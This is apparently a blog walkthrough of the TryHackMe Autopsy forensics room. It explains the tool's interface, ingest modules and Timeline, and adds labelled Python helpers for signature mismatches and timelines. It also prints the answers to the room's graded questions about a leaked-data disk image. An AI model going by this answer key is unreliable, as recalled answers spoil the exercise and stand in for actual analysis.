    Autopsy case files have an .aut file extension. Navigate to the case folder and select the .aut file you wish to open. 

     

     


     

     



    Next, Autopsy will process the case files and open the case.

    You can identify the name of the case at the top left corner of the Autopsy window. In the image below, the name of this case is Tryhackme.


     

     


     

     
    Note: If Autopsy is unable to locate the disk image, a warning box will appear. At this point, you can point Autopsy to the location of the disk image it's attempting to find, or you can click NO; you can still analyze the data from the Autopsy case.




     
    Once the case you wish to analyze is open, you are ready to start analyzing the data. 


    1) Autopsy files end with which file extension?

    Ans :- .aut


     



    Data Sources


    Before diving into analyzing the data, let's briefly cover the different data sources Autopsy can analyze.

    Below is a screenshot of the Add Data Source Windows dialog box.

     




     

     


    In this room, we will focus primarily on the first option, Disk Image or VM file.


    Supported Disk Image Formats:

    •     Raw Single (For example: *.img, *.dd, *.raw, *.bin)
    •     Raw Split (For example: *.001, *.002, *.aa, *.ab, etc)
    •     EnCase (For example: *.e01, *.e02, etc)
    •     Virtual Machines (For example: *.vmdk, *.vhd)


    If there are multiple image files (i.e. E01, E02, E03, etc.) Autopsy only needs you to point to the first image file, and Autopsy will handle the rest. 

    Note: Refer to the Autopsy documentation to understand the other data sources that can be added to a case.

    Below is a screenshot of an E01 disk image added to a sample case as a data source.




     

     

     

    Specify the time zone and click Next.

    Note: Orphan files are deleted files that no longer have a parent folder. In FAT file systems, finding them can be time-consuming, which is why Autopsy offers the option to ignore them for faster results.


     
    1) In the above screenshot, what is the disk image format for SUSPECTHD?

    Ans :- Encase




     



    Ingest Modules


    Essentially Ingest Modules are Autopsy plug-ins. Each Ingest Module is designed to analyze and retrieve specific data from the drive.

    Below is a screenshot of the Configure Ingest Modules window.








    By default, the Ingest Modules are configured to run on All Files, Directories, and Unallocated Space.

     






    The other two options are:


    •     All Files and Directories (Not Unallocated Space)
    •     Create/edit file ingest filters...


    Note: We will not cover ingest filters in this room.


    If all the Ingest Modules are deselected, and Next is selected, Autopsy will still process the data source and update the local database.







    Note: Autopsy adds metadata about files to the local database, not the actual file contents.

    When Autopsy is done, you will see the following:








    To complete this process, click Finish.

    In the below image, since the Ingest Modules were deselected, there aren't any results in the Results node.









     


    The results of any Ingest Module you select to run against a data source will populate the Results node in the Tree view, which is the left pane of the Autopsy user interface.

    You can run Ingest Modules at any time while the case is open. To do so, right-click on the data source and select Run Ingest Modules.




     
    As Ingest Modules run, alerts may appear in the Ingest Inbox.




     


    Below is an example of the Ingest Inbox after a few Ingest Modules have completed running. 






    Drawing the attention back to the Configure Ingest Modules window, notice that some Ingest Modules have per-run settings and some do not.

    For example, the Recent Activity Ingest Module does not have per-run settings. In contrast, the Hash Lookup Ingest Module does.


    To learn more about Ingest Modules, read Autopsy documentation here.




     

    The User Interface


    Let's look at the Autopsy user interface, which is comprised of 5 primary areas:


    •     Tree Viewer (Left pane)
    •     Result Viewer (Top right pane)
    •     Keyword Search (Upper Top Right)
    •     Contents Viewer (Bottom right pane)
    •     Status Area (Lower Bottom right)


    Each area will be explained briefly below.







    The Tree Viewer has 5 top-level nodes:



    • Data Sources - all the data will be organized as you would typically see it in a normal Windows File Explorer.
    • Views - files will be organized based on file types, MIME types, file size, etc.
    • Results - as mentioned earlier, this is where the results from Ingest Modules will appear.
    • Tags - will display files and/or results that have been tagged (read more about tagging here)
    • Reports - will display reports either generated by modules or the analyst (read more about reporting here)

       
       

    Refer to the Autopsy documentation on the Tree Viewer for more information here.




    Result Viewer


    Note: Don't confuse the Results node (from the Tree Viewer) with the Result Viewer.

    When a volume, file, folder, etc. is selected from the Tree Viewer, additional information about the selected item is displayed in the Result Viewer.

    For example, the Sample case's data source is selected, and now additional information is visible in the Results Viewer.




     

     

    If a volume is selected, the Result Viewer's information will change to reflect the information in the local database for the selected volume.







    Notice that the Result Viewer pane has 3 tabs: Table, Thumbnail, and Summary. The 2 above screenshots reflect the information displayed in the Table tab. 

    The Thumbnail tab works best with image or video files. If the view of the above data is changed from Table to Thumbnail, not much information will be displayed. See below.






    Volume nodes can be expanded, and an analyst can navigate the volume's contents, as they would a typical Windows system.







    In the Views tree node, files are categorized by File Types - By Extension, By MIME Type, Deleted Files, and By File Size.

     






    Tip: When it comes to File Types, pay attention to this section. An adversary can rename a file with a misleading file extension, so the file will be miscategorized By Extension but will still be categorized correctly By MIME Type, because the MIME type is determined from the file's content (its leading signature bytes) rather than its name.
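    The same content-versus-name check can be reproduced outside Autopsy, which is useful for scripting a first pass over an exported folder. The following is an added example (not Autopsy code and not from the room) that compares the type a file extension claims with the type its magic bytes reveal, using real signatures for a few common formats; the "files" it inspects are constructed byte strings, and the "budget.xlsx" and "secret.png" entries are deliberately mislabelled to show what the check catches.

```python
import os

# Real file signatures (magic bytes) for a handful of common formats.
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
    "zip": b"PK\x03\x04",   # Office OOXML (docx/xlsx/pptx), jar and apk are zip containers
    "exe": b"MZ",           # Windows PE executables and DLLs
}

# Extensions whose on-disk container is one of the signatures above.
EXT_ALIASES = {"jpeg": "jpg", "docx": "zip", "xlsx": "zip", "pptx": "zip",
               "jar": "zip", "apk": "zip", "dll": "exe", "sys": "exe"}


def sniff(data):
    """Return the format name whose signature matches the first bytes, or None if unknown."""
    for name, sig in SIGNATURES.items():
        if data.startswith(sig):
            return name
    return None


def check_file(name, data):
    """Compare what the extension claims with what the content says (the By MIME Type idea)."""
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    claimed = EXT_ALIASES.get(ext, ext)
    actual = sniff(data)
    return {"name": name, "claimed": claimed, "actual": actual,
            # flag only when a different type was positively identified; unknown content is not evidence
            "mismatch": actual is not None and actual != claimed}


def find_mismatches(files):
    """Names of files whose content type contradicts their extension."""
    return [r["name"] for r in (check_file(n, d) for n, d in files.items()) if r["mismatch"]]


# Constructed sample "files": name -> leading bytes. None of these come from a real disk image.
SAMPLE_FILES = {
    "vacation.jpg":   b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "notes.txt":      b"just some text",
    "quarterly.docx": b"PK\x03\x04\x14\x00\x06\x00",
    "budget.xlsx":    b"MZ\x90\x00\x03\x00\x00\x00",     # a PE executable renamed to look like a spreadsheet
    "secret.png":     b"%PDF-1.7\n%\xe2\xe3\xcf\xd3",    # a PDF hiding behind an image extension
}

if __name__ == "__main__":
    for n, d in SAMPLE_FILES.items():
        r = check_file(n, d)
        flag = "MISMATCH" if r["mismatch"] else ""
        print(f'{n:<16} claims {r["claimed"]:<4} content {r["actual"] or "?":<4} {flag}')
```

    On a real export, read the first 16 bytes of each file with open(path, "rb").read(16) and pass them to check_file. Unknown content is deliberately not reported: a plain text file has no signature, and flagging it would bury the two genuine mislabels in noise.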

    Expand By Extension and more children nodes appear, categorizing files even further (see below).









    Refer to the Autopsy documentation on the Result Viewer for more information here.

    Contents Viewer


    From the Table tab in the Result Viewer, if you click any folder/file, additional information is displayed in the Contents Viewer pane.









    In the above image, three columns might not be immediately clear:

    S = Score: the Score column shows a red exclamation point for a folder/file marked/tagged as notable and a yellow triangle pointing downward for one marked/tagged as suspicious. These items can be marked/tagged by an Ingest Module or by the analyst.

    C = Comment: a yellow page icon in the Comment column indicates that there is a comment for the folder/file.

    O = Occurrence: in a nutshell, this column indicates how many times this file/folder has been seen in past cases (this requires the Central Repository).

    Refer to the Autopsy documentation on the Contents Viewer for more information here.




    Keyword Search

    At the top right, you will find Keyword Lists and Keyword Search.

    With Keyword Search, an analyst can perform an AD-HOC keyword search.







    In the image above, the analyst is searching for the word 'secret.' Below are the search results.








    Refer to the Autopsy documentation for more information on how to perform keyword searches with either option.


    Status Area



    Lastly, the Status Area is at the bottom right.

    When Ingest Modules are running, a progress bar (along with the percentage completed) will be displayed in this area. If you click on the bar, more detailed information regarding the Ingest Modules is provided.


    If the X (directly next to the progress bar) is clicked, a prompt will appear asking you to confirm that you wish to cancel the running Ingest Modules.

    Refer to the Autopsy documentation on the UI overview here.






     


    Data Analysis


    Case Scenario: An employee was suspected of leaking company data. A disk image was retrieved from the machine. You were assigned to perform the initial analysis. Further action will be determined based on the initial findings.

    Reminder: Since the actual disk image is not in the attached VM, certain Autopsy sections will not display any actual data, only the metadata for that row within the local database. You can click No when you're notified about the 'Missing Image.' Additionally, you do not need to run any ingest modules in this exercise.







    1) What is the full name of the operating system version?


    Ans :- Windows 7 Ultimate Service Pack 1










    2) What percentage of the drive are documents? Include the % in your answer.

    Ans :- 40.8%










    3) The majority of file events occurred on what date? (MONTH DD, YYYY)

    Ans :- March 25, 2015









    4) What is the name of an Installed Program with the version number of 6.2.0.2962?


    Ans :- Eraser
     






    5) A user has a Password Hint. What is the value?

    Ans :- IAMAN










     

    6) Numerous SECRET files were accessed from a network drive. What was the IP address?

    Ans :- 10.11.11.128








     

     

    7) What web search term has the most entries?

    Ans :- information leakage cases
     








     

     

    8) What was the web search conducted on 3/25/2015 21:46:44?

    Ans :- anti-forensic tools






     

     

     

    9) What binary is listed as an Interesting File?

    Ans :- googledrivesync.exe





     

     



    10) What self-assuring message did the 'Informant' write for himself on a Sticky Note? (no spaces)



    Ans :-  Tomorrow...everything will be ok..
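    Questions 6 to 8 are all answered from the Results tree: Web Search Engine Query artifacts (parsed out of browser history) and Recent Documents (LNK files and MRU keys, whose paths reveal the \\host\share of a network drive). When there are hundreds of rows, exporting the table to CSV and aggregating it is quicker than scrolling. The Python below is an added example written for this post, not code from TryHackMe or from Autopsy; it assumes a constructed, simplified three-column CSV (artifact, timestamp, value), which is not Autopsy's real export layout, and the rows are made up around the room's answers so the helpers can be checked offline.

```python
"""
Triage of Results artifacts exported from Autopsy (Web Search Engine Query,
Recent Documents). Added example for this post, not part of the TryHackMe
room or of Autopsy. The CSV is constructed and simplified: the column names
are an assumption rather than Autopsy's real export layout, and the values
are made up around the room's answers so the helpers can be checked offline.
"""
import csv
import io
import re
from collections import Counter
from datetime import datetime

SAMPLE_CSV = r"""artifact,timestamp,value
Web Search,2015-03-25 21:40:12,information leakage cases
Web Search,2015-03-25 21:41:03,information leakage cases
Web Search,2015-03-25 21:46:44,anti-forensic tools
Web Search,2015-03-25 21:50:19,information leakage cases
Web Search,2015-03-25 22:01:55,eraser secure delete
Recent Documents,2015-03-25 20:02:10,\\10.11.11.128\share\SECRET_budget_2015.xlsx
Recent Documents,2015-03-25 20:05:31,\\10.11.11.128\share\SECRET_client_list.docx
Recent Documents,2015-03-25 20:09:47,C:\Users\informant\Desktop\resume.docx
Recent Documents,2015-03-24 18:30:00,\\FILESRV01\public\holiday_schedule.xlsx
"""

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\... -> host
# Timestamps as the (assumed) export writes them, and as the room's question writes them.
TS_FORMATS = ("%Y-%m-%d %H:%M:%S", "%m/%d/%Y %H:%M:%S")


def parse_ts(text):
    """Accept either timestamp style so a question's time can be compared to a row's."""
    for fmt in TS_FORMATS:
        try:
            return datetime.strptime(text, fmt)
        except ValueError:
            continue
    raise ValueError(f"unrecognised timestamp: {text!r}")


def load_rows(text):
    return list(csv.DictReader(io.StringIO(text)))


def search_term_counts(rows):
    """How many times each web search term was recorded."""
    return Counter(r["value"] for r in rows if r["artifact"] == "Web Search")


def top_search_term(rows):
    """(term, count) for the search term with the most entries."""
    return search_term_counts(rows).most_common(1)[0]


def search_at(rows, when):
    """Web search term(s) recorded at exactly the given time."""
    target = parse_ts(when)
    return [r["value"] for r in rows
            if r["artifact"] == "Web Search" and parse_ts(r["timestamp"]) == target]


def network_hosts_for(rows, marker):
    """Hosts (IP or name) of UNC paths whose file name contains marker, with counts."""
    hosts = Counter()
    for r in rows:
        if r["artifact"] != "Recent Documents":
            continue
        m = UNC_HOST.match(r["value"])
        if m is None:
            continue  # local path, not a network drive
        filename = r["value"].rsplit("\\", 1)[-1]
        if marker.lower() in filename.lower():
            hosts[m.group(1)] += 1
    return hosts


if __name__ == "__main__":
    rows = load_rows(SAMPLE_CSV)
    print("most frequent search:", top_search_term(rows))
    print("search at 3/25/2015 21:46:44:", search_at(rows, "3/25/2015 21:46:44"))
    print("hosts serving SECRET files:", dict(network_hosts_for(rows, "SECRET")))
```

    One caveat that matters for the timestamp question: Autopsy shows times in the case's display time zone, which is configurable, so the time in the question has to be compared in that same zone, and an export taken with a different display zone would not match.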


     


     

     

     


    Visualization Tools


    You may have noticed that other parts of the user interface haven't been discussed yet.


    Please refer to the Autopsy documentation for the following visualization tool:

     


    Note: Within the attached VM, you will NOT be able to practice with some of the visualization tools, except for Timeline.

    Below is a screenshot of the Timeline.







    The Timeline tool is composed of 3 areas:


    • Filters - narrow the events displayed based on the filter criteria
    • Events - the events are displayed here based on the View Mode
    • Files/Contents - additional information on the event(s) is displayed in this area   

       
       

    There are 3 view modes:


    • Counts - the number of events is displayed in a bar chart view
    • Details - information on events is displayed, but they are clustered and collapsed, so the UI is not overloaded
    • List - the events are displayed in a table view




    In the above screenshot, the View Mode is Counts. Below is a screenshot of the Details View Mode.








    The numbers (seen above) indicate the number of clustered/collapsed events for a specific time frame.

    For example, for /Windows, there are 130,257 events between 2009-06-10 and 2010-03-18. See the below image.








    To expand a cluster, click on the green icon with the plus sign. See the below example.









    To collapse the events, click on the red icon with a minus sign.

    Click the map marker icon with a plus sign if you wish to pin a group of events. This will move (pin) the events to an isolated section of the Events view.







    To unpin the events, click on the map marker with the minus sign.

    The last group of icons to cover are the eye icons. If you wish to hide a group of events from the Events view, click on the eye with a minus sign.

    In the below screenshot, the clustered events for /Boot were hidden and were placed in Hidden Descriptions (in the Filters area).

     


     
     
     
     
     
     



    If you wish to reverse that action and unhide the events, right-click and select Unhide and remove from list. See the below example.




     
     





    Last but not least, below is a screenshot of the List View Mode.






    This should be enough information to get you started interacting with the Timeline with some level of confidence.
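    To make the Counts and Details views concrete, here is an added example written for this post (not code from TryHackMe or Autopsy) that builds the same kind of timeline outside the GUI. Autopsy generates its Timeline from the case database; the nearest command-line equivalent is a Sleuth Kit bodyfile, produced for example with fls -m / -r image.dd (one line per file: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime, times in epoch seconds). As in Autopsy, every non-zero timestamp becomes one event, so a single file can contribute up to four events to a day. The bodyfile below is constructed, and the clustering by top-level directory mirrors what the Details view shows for /Windows or /Boot, including a hidden-prefix filter that does what Hidden Descriptions does.

```python
"""
Counts-style and Details-style timeline from a Sleuth Kit bodyfile. Added
example for this post, not part of the TryHackMe room or of Autopsy.
Bodyfile format (fls -m / tsk_gettimes):
MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
Each non-zero timestamp becomes one event, as in Autopsy's Timeline.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timezone

# Column order of the four time fields in a bodyfile line.
EVENT_TYPES = ("accessed", "modified", "changed", "created")

# Constructed sample bodyfile (not from the room's disk image).
SAMPLE_BODYFILE = """\
0|/Windows/System32/ntoskrnl.exe|1234|r/rrwxrwxrwx|0|0|5526744|1421050000|1421050000|1421050000|1421050000
0|/Users/informant/Desktop/SECRET_budget_2015.xlsx|2001|r/rrwxrwxrwx|0|0|31240|1427290000|1421060000|1421060000|1421060000
0|/Users/informant/Downloads/Eraser.exe|2002|r/rrwxrwxrwx|0|0|9437184|1427295000|1427295000|1427295000|1427295000
0|/Users/informant/AppData/Local/Temp/tmp0001.tmp|2003|r/rrwxrwxrwx|0|0|0|0|1421070000|1421070000|0
0|/Boot/BCD|55|r/rrwxrwxrwx|0|0|32768|1421040000|1421040000|1421040000|1421040000
"""


@dataclass(frozen=True)
class Event:
    when: datetime  # timezone-aware, UTC
    kind: str       # one of EVENT_TYPES
    path: str


def parse_bodyfile(text):
    """One Event per non-zero timestamp; TSK writes 0 for times the file system lacks."""
    events = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("|")
        if len(fields) != 11:
            raise ValueError(f"line {lineno}: expected 11 fields, got {len(fields)}")
        path = fields[1]
        for kind, raw in zip(EVENT_TYPES, fields[7:11]):
            ts = int(raw)
            if ts <= 0:
                continue
            events.append(Event(datetime.fromtimestamp(ts, tz=timezone.utc), kind, path))
    return events


def counts_per_day(events, tz=timezone.utc, hidden_prefixes=()):
    """Counts view: events per calendar day in the display zone, minus hidden paths."""
    visible = (e for e in events if not e.path.startswith(tuple(hidden_prefixes)))
    return Counter(e.when.astimezone(tz).date().isoformat() for e in visible)


def cluster_by_top_dir(events, depth=1):
    """Details view: events grouped by leading path component, with first/last time."""
    clusters = defaultdict(lambda: {"count": 0, "first": None, "last": None})
    for e in events:
        key = "/" + "/".join(e.path.strip("/").split("/")[:depth])
        c = clusters[key]
        c["count"] += 1
        if c["first"] is None or e.when < c["first"]:
            c["first"] = e.when
        if c["last"] is None or e.when > c["last"]:
            c["last"] = e.when
    return dict(clusters)


if __name__ == "__main__":
    evs = parse_bodyfile(SAMPLE_BODYFILE)
    for day, n in sorted(counts_per_day(evs).items()):
        print(f"{day}  {'#' * n} {n}")
    for key, c in sorted(cluster_by_top_dir(evs).items()):
        print(f"{key:10} {c['count']:4} events  {c['first']:%Y-%m-%d} .. {c['last']:%Y-%m-%d}")
```

    The tz parameter is there for the same reason the room's question can trip people up: the date an event lands on depends on the display time zone, and Autopsy's Timeline uses the zone configured for the case, so a count for 2015-01-12 taken in UTC can differ from one taken in a local zone.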


    1) Using the Timeline, how many results were there on 2015-01-12?

    Ans :- 46






    Conclusion

     

    To conclude, there is more to Autopsy that wasn't covered in detail within this room.


    Below are some topics that you should explore on your own to configure Autopsy to do more out of the box:


    • Global Hash Lookup Settings
    • Global File Extension Mismatch Identification Settings
    • Global Keyword Search Settings
    • Global Interesting Items Settings
    • Yara Analyzer


    3rd Party modules are available for Autopsy. Visit the official SleuthKit GitHub repo for a list of 3rd party modules here.


    The disk image used in this room's development was created and released by NIST under the Computer Forensic Reference Data Sets (CFReDS) Project. You are encouraged to download the disk image and go through the full exercise (here) to practice using Autopsy and level up your investigation techniques.





    Disclaimer

     

    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage ..!
    The author is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. These hacking tutorials are against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

     